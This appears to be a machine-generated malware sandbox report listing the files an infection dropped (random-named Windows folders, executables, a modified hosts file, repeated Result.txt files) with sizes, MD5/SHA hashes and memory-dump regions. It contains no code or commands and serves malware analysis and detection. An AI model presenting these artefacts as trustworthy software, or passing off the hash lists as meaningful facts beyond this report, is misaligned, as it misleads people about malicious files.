2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsyF55E.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\buzcwvvny\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

Filesize
648B

MD5
e504fac079b28d31d291a6a98ce4d95c

SHA1
b210da29ab6ff15ef457818bec6b8260b7df2d6d

SHA256
7c52f56610887054f59b812133d46ed97a575aca3ee5c12daf473b85b02325ca

SHA512
25f451bad815f8667ffea643d2982d71630c71fb50bc7daba73c45363fc615b3a7ec78ca94fa3abeedd47ca57a41b94d4c47d2ef286727e646a47b0452c51dd3

Download Submit
C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

Filesize
1KB

MD5
3971091ac05d01232a2d5d4574817816

SHA1
3248591870bea1974d59f856dfaa8cd47245e655

SHA256
e9f46f405ee8e88b98d21fd69e9871c41d80a1c37c563d135c2213cf90d09685

SHA512
f76d163bf88f6a222c78d035d5033decebffa2d8f502076576f64a34b973883f6aaf9b314478a6f9a81201e38132d65e17449300d03cb5ad94b067a7f00c9597

Download Submit
C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

Filesize
1KB

MD5
23d6505b2d437c2c5cc8799097dc49fe

SHA1
85742c4f9cd44f70bc8cd726d6202a2644fe339f

SHA256
d59ac8014be6d8526d36438d2f6334507ad0284a7c1fe5df374dc312934b15ea

SHA512
666eb08cd2f42f36ed94803d86b97f2c2478893da06c2973572d9f6abb6e865ad6a6cf6229c2343bf2bb4aa7ca7cd510456909ee5344ac335639a73e28370d3d

Download Submit
C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

Filesize
2KB

MD5
1ae3409b101a3633568395104d0a2824

SHA1
b23ddfb2cb83abdba64fe61a8c8388a87744f972

SHA256
dccaeb7c8b008b9b4497906f907c9cbc728262a9c14bc79ee409610d001e62c5

SHA512
023ee5cf1ce2b87aa5156e4b433c8b348dcd91f4eccc7ea4eaa061945a02c5e193cea6d56db36355a9b81add74970d48b1f78fba49135245dad75d42ef71324a

Download Submit
C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

Filesize
2KB

MD5
d46f15ca6bda1728e09b826549287e9d

SHA1
9c6e0d282050fd9bb9551eb6abef8cf9c92464d0

SHA256
2064f52fe6b2178ed9fa50ecc6f36dd8ddd6ba5d697d49dfff8e26c0178d5be8

SHA512
0eb9483138fb30f55d935a9935395cc29e16959e9ad4397cf684efb6cc9bf6a4c92a4b8850c5b1e6fb8a9d44d5d4dfceade2daeb0d75f16f3c7f99e988f67241

Download Submit
C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

Filesize
2KB

MD5
18b2113923264fb7c62d51946fc5f5ab

SHA1
0478877d5d76ee911b42ad881697f9476bd62671

SHA256
859863a1c6eae8c564839a4e831aedd87a6db268e65eff5563fcb82af4db1947

SHA512
f59a05c444c0b6e7e579e62f2ccf37b8141a4c2f88f7dda8e5ac0c552fac9302abe7728d2a433c87c54573bac88f76369a923d70a82444ede834223ec099a3be

Download Submit
C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

Filesize
3KB

MD5
236596d3e465df029fad58682356f646

SHA1
06e2d65f7631109e1d19a95b5e9f9ccc47f85d86

SHA256
e5aa28c5fee741f3ef1904adef88501411cfeeb42b8e76838d9aa012d8a7b07c

SHA512
e70e03b926fd8b3bb4fce8a1db58ebcad2a7027cf0922c8f27daf72ca0bcf3f6d90bd6758350308b01de7cc0ebf9bb81ad75cf5252c622add4e119ae894bc0ac

Download Submit
C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

Filesize
3KB

MD5
91154d34e564666feb0f11d72f994458

SHA1
254e1a1b76a88c01ef45dc75264e1f3702194ae9

SHA256
a5eaaf414aadf0256716f04c2ee9e4d5a334ab2358fc7f6c35445cb0e9af3cd3

SHA512
7e76296cdf589496d3890a23529b5863d21abb8f5adc6015e940cbb9e9eb081846c368e22620fd49c51c4fe623202776885ea252887a6acedc4db9deaf6de7df

Download Submit
C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

Filesize
3KB

MD5
d4b2b074277849ec1c892a7abde6603a

SHA1
c3805ce103f55ada28d544dd24d67eef45fd5ce3

SHA256
d1b8d6d2ffffa0386fac614c0f9afd8c5e940a984e5bc37494ee744220af7068

SHA512
7d51b2821e810afc6df60c58ebdbc779b335f779cf4a32329a1c1703442f4325b9edd131259ab12a49e55a1818dab6dee962a79f458893055f0f15fd99427afe

Download Submit
C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

Filesize
4KB

MD5
d738505010e0da39daa40e56a7017f64

SHA1
b7d35cf135dec783e78eb43c77d4bed3e186713a

SHA256
800cee835c47dda1433c7e42cc395705c9843294b1cfb4721aca85c4b6becce9

SHA512
6214624054e652d6756f85e76b13d31ac0f12ead3887e9257d21d525c467400f167a5f228f0dd5895c2a0aa2d8eb1fc8c085a68d32ce1ad926cbc7abcf7f1456

Download Submit
C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
C:\Windows\tmbllbvl\ibebikp.exe

Filesize
10.4MB

MD5
bb083a6f0fa104de557e69f11e72a373

SHA1
de847d297c7e22ca34f7eb895ac17fb6553ec23b

SHA256
0a3a4c2bd68ab620ffbc6b8956da9f73c4850fb670670325f0100355d8cd0e01

SHA512
21bc7e3c513aef076e7a6c3afc1509c7651a1f330d527cd78333ee876e5769ec3b215b251f1b7dd343c5281054c640a1aab4dbe2bb1675d5763bb8444905a331

Download Submit
memory/996-238-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/1436-224-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/1660-193-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/1796-185-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/1840-178-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1840-218-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1840-499-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1840-501-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1840-232-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1840-758-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1840-168-0x0000029EA7BA0000-0x0000029EA7BB0000-memory.dmp

Filesize
64KB

Download
memory/1840-212-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1840-249-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1840-756-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1840-498-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1840-199-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1840-165-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1840-182-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp

Filesize
1.1MB

Download
memory/1948-180-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/2000-189-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/2388-160-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/2388-142-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/2508-202-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/2680-175-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/2912-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3384-228-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/3388-206-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/3404-236-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/4064-171-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/4472-210-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/4480-78-0x0000000001780000-0x00000000017CC000-memory.dmp

Filesize
304KB

Download
memory/4556-136-0x00007FF6F45B0000-0x00007FF6F469E000-memory.dmp

Filesize
952KB

Download
memory/4556-138-0x00007FF6F45B0000-0x00007FF6F469E000-memory.dmp

Filesize
952KB

Download
memory/4564-215-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/4568-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/4568-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/4620-231-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/4708-248-0x00000000004F0000-0x0000000000502000-memory.dmp

Filesize
72KB

Download
memory/4816-197-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download
memory/4984-149-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/4984-162-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/5104-220-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp

Filesize
364KB

Download